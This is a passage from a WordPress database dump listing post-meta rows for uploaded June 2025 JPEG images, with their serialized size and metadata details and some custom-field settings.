:8:\"filesize\";i:22016;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1459,471,'_wp_attached_file','2025/06/499373748_122228242052202781_7736484197867167976_n.jpg'),
(1460,471,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/499373748_122228242052202781_7736484197867167976_n.jpg\";s:8:\"filesize\";i:554959;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"499373748_122228242052202781_7736484197867167976_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25829;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"499373748_122228242052202781_7736484197867167976_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199180;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"499373748_122228242052202781_7736484197867167976_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10250;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"499373748_122228242052202781_7736484197867167976_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124212;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"499373748_122228242052202781_7736484197867167976_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:358605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"499373748_122228242052202781_7736484197867167976_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25684;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1461,472,'_wp_attached_file','2025/06/499017402_122228241992202781_5777500599788972527_n.jpg'),
(1462,472,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/499017402_122228241992202781_5777500599788972527_n.jpg\";s:8:\"filesize\";i:506437;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"499017402_122228241992202781_5777500599788972527_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23743;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"499017402_122228241992202781_5777500599788972527_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180299;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"499017402_122228241992202781_5777500599788972527_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9627;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"499017402_122228241992202781_5777500599788972527_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111938;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"499017402_122228241992202781_5777500599788972527_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324875;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"499017402_122228241992202781_5777500599788972527_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1463,473,'_wp_attached_file','2025/06/499708540_122228242064202781_3633598253689018762_n.jpg'),
(1464,473,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/499708540_122228242064202781_3633598253689018762_n.jpg\";s:8:\"filesize\";i:452583;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"499708540_122228242064202781_3633598253689018762_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22051;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"499708540_122228242064202781_3633598253689018762_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161406;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"499708540_122228242064202781_3633598253689018762_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9244;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"499708540_122228242064202781_3633598253689018762_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100251;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"499708540_122228242064202781_3633598253689018762_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:288408;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"499708540_122228242064202781_3633598253689018762_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21766;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1465,469,'_edit_last','1'),
(1466,469,'title_style','default'),
(1467,469,'_title_style','field_5d1a0217cf408'),
(1468,469,'related',''),
(1469,469,'_related','field_603b51c3e183e'),
(1470,474,'title_style','default'),
(1471,474,'_title_style','field_5d1a0217cf408'),
(1472,474,'related',''),
(1473,474,'_related','field_603b51c3e183e'),
(1483,476,'title_style','default'),
(1484,476,'_title_style','field_5d1a0217cf408'),
(1485,476,'related',''),
(1486,476,'_related','field_603b51c3e183e'),
(1487,477,'_wp_attached_file','2025/06/499373748_122228242052202781_7736484197867167976_n-1.jpg'),
(1488,477,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/499373748_122228242052202781_7736484197867167976_n-1.jpg\";s:8:\"filesize\";i:554959;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"499373748_122228242052202781_7736484197867167976_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25829;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"499373748_122228242052202781_7736484197867167976_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199180;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"499373748_122228242052202781_7736484197867167976_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10250;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"499373748_122228242052202781_7736484197867167976_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124212;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"499373748_122228242052202781_7736484197867167976_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:358605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"499373748_122228242052202781_7736484197867167976_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25684;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1489,478,'_wp_attached_file','2025/06/499017402_122228241992202781_5777500599788972527_n-1.jpg'),
(1490,478,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/499017402_122228241992202781_5777500599788972527_n-1.jpg\";s:8:\"filesize\";i:506437;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"499017402_122228241992202781_5777500599788972527_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23743;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"499017402_122228241992202781_5777500599788972527_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180299;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"499017402_122228241992202781_5777500599788972527_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9627;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"499017402_122228241992202781_5777500599788972527_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111938;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"499017402_122228241992202781_5777500599788972527_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324875;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"499017402_122228241992202781_5777500599788972527_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1492,480,'_wp_attached_file','2025/06/499708540_122228242064202781_3633598253689018762_n-1.jpg'),
(1493,480,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/499708540_122228242064202781_3633598253689018762_n-1.jpg\";s:8:\"filesize\";i:452583;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"499708540_122228242064202781_3633598253689018762_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22051;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"499708540_122228242064202781_3633598253689018762_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161406;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"499708540_122228242064202781_3633598253689018762_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9244;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"499708540_122228242064202781_3633598253689018762_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100251;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"499708540_122228242064202781_3633598253689018762_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:288408;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"499708540_122228242064202781_3633598253689018762_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21766;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1494,469,'_thumbnail_id','471'),
(1497,481,'title_style','default'),
(1498,481,'_title_style','field_5d1a0217cf408'),
(1499,481,'related',''),
(1500,481,'_related','field_603b51c3e183e'),
(1501,482,'_edit_lock','1749192582:1'),
(1502,483,'_wp_attached_file','2025/06/499049665_122228239400202781_4657595105248751273_n.jpg'),
(1503,483,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:843;s:6:\"height\";i:1192;s:4:\"file\";s:62:\"2025/06/499049665_122228239400202781_4657595105248751273_n.jpg\";s:8:\"filesize\";i:224135;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"499049665_122228239400202781_4657595105248751273_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24067;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"499049665_122228239400202781_4657595105248751273_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182951;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"499049665_122228239400202781_4657595105248751273_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10150;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"499049665_122228239400202781_4657595105248751273_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198493;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"499049665_122228239400202781_4657595105248751273_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24139;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1504,484,'_wp_attached_file','2025/06/500025451_122228239478202781_8712159298643584980_n.jpg'),
(1505,484,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/500025451_122228239478202781_8712159298643584980_n.jpg\";s:8:\"filesize\";i:476022;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"500025451_122228239478202781_8712159298643584980_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20666;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"500025451_122228239478202781_8712159298643584980_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163300;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"500025451_122228239478202781_8712159298643584980_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8909;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"500025451_122228239478202781_8712159298643584980_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99693;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"500025451_122228239478202781_8712159298643584980_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:297759;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"500025451_122228239478202781_8712159298643584980_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20996;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1506,485,'_wp_attached_file','2025/06/499420191_122228240156202781_2677112695390255535_n.jpg'),
(1507,485,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1354;s:6:\"height\";i:960;s:4:\"file\";s:62:\"2025/06/499420191_122228240156202781_2677112695390255535_n.jpg\";s:8:\"filesize\";i:200071;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"499420191_122228240156202781_2677112695390255535_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20847;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"499420191_122228240156202781_2677112695390255535_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147995;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"499420191_122228240156202781_2677112695390255535_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8914;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"499420191_122228240156202781_2677112695390255535_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95634;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"499420191_122228240156202781_2677112695390255535_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21756;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1508,482,'_edit_last','1'),
(1509,482,'title_style','default'),
(1510,482,'_title_style','field_5d1a0217cf408'),
(1511,482,'related','1'),
(1512,482,'_related','field_603b51c3e183e'),
(1513,486,'title_style','default'),
(1514,486,'_title_style','field_5d1a0217cf408'),
(1515,486,'related','1'),
(1516,486,'_related','field_603b51c3e183e'),
(1521,487,'_wp_attached_file','2025/06/500321709_122228239412202781_2013079884334630748_n.jpg'),
(1522,487,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1354;s:6:\"height\";i:960;s:4:\"file\";s:62:\"2025/06/500321709_122228239412202781_2013079884334630748_n.jpg\";s:8:\"filesize\";i:256777;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"500321709_122228239412202781_2013079884334630748_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25724;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"500321709_122228239412202781_2013079884334630748_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185383;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"500321709_122228239412202781_2013079884334630748_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10618;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"500321709_122228239412202781_2013079884334630748_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120410;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"500321709_122228239412202781_2013079884334630748_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25253;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1524,482,'_thumbnail_id','487'),
(1533,482,'related_0_post',''),
(1534,482,'_related_0_post','field_603b51e5e183f'),
(1535,486,'related_0_post',''),
(1536,486,'_related_0_post','field_603b51e5e183f'),
(1537,490,'_edit_lock','1749196056:1'),
(1538,491,'_wp_attached_file','2025/06/498670339_1093158059515626_6804921364808443539_n.jpg'),
(1539,491,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:60:\"2025/06/498670339_1093158059515626_6804921364808443539_n.jpg\";s:8:\"filesize\";i:130584;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"498670339_1093158059515626_6804921364808443539_n-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20677;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"498670339_1093158059515626_6804921364808443539_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8328;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"498670339_1093158059515626_6804921364808443539_n-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90615;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"498670339_1093158059515626_6804921364808443539_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1540,490,'_edit_last','1'),
(1541,490,'title_style','default'),
(1542,490,'_title_style','field_5d1a0217cf408'),
(1543,490,'related',''),
(1544,490,'_related','field_603b51c3e183e'),
(1545,492,'title_style','default'),
(1546,492,'_title_style','field_5d1a0217cf408'),
(1547,492,'related',''),
(1548,492,'_related','field_603b51c3e183e'),
(1552,494,'_wp_attached_file','2025/06/498670339_1093158059515626_6804921364808443539_n-1.jpg'),
(1553,494,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:62:\"2025/06/498670339_1093158059515626_6804921364808443539_n-1.jpg\";s:8:\"filesize\";i:130584;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"498670339_1093158059515626_6804921364808443539_n-1-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20677;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"498670339_1093158059515626_6804921364808443539_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8328;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"498670339_1093158059515626_6804921364808443539_n-1-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90615;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"498670339_1093158059515626_6804921364808443539_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
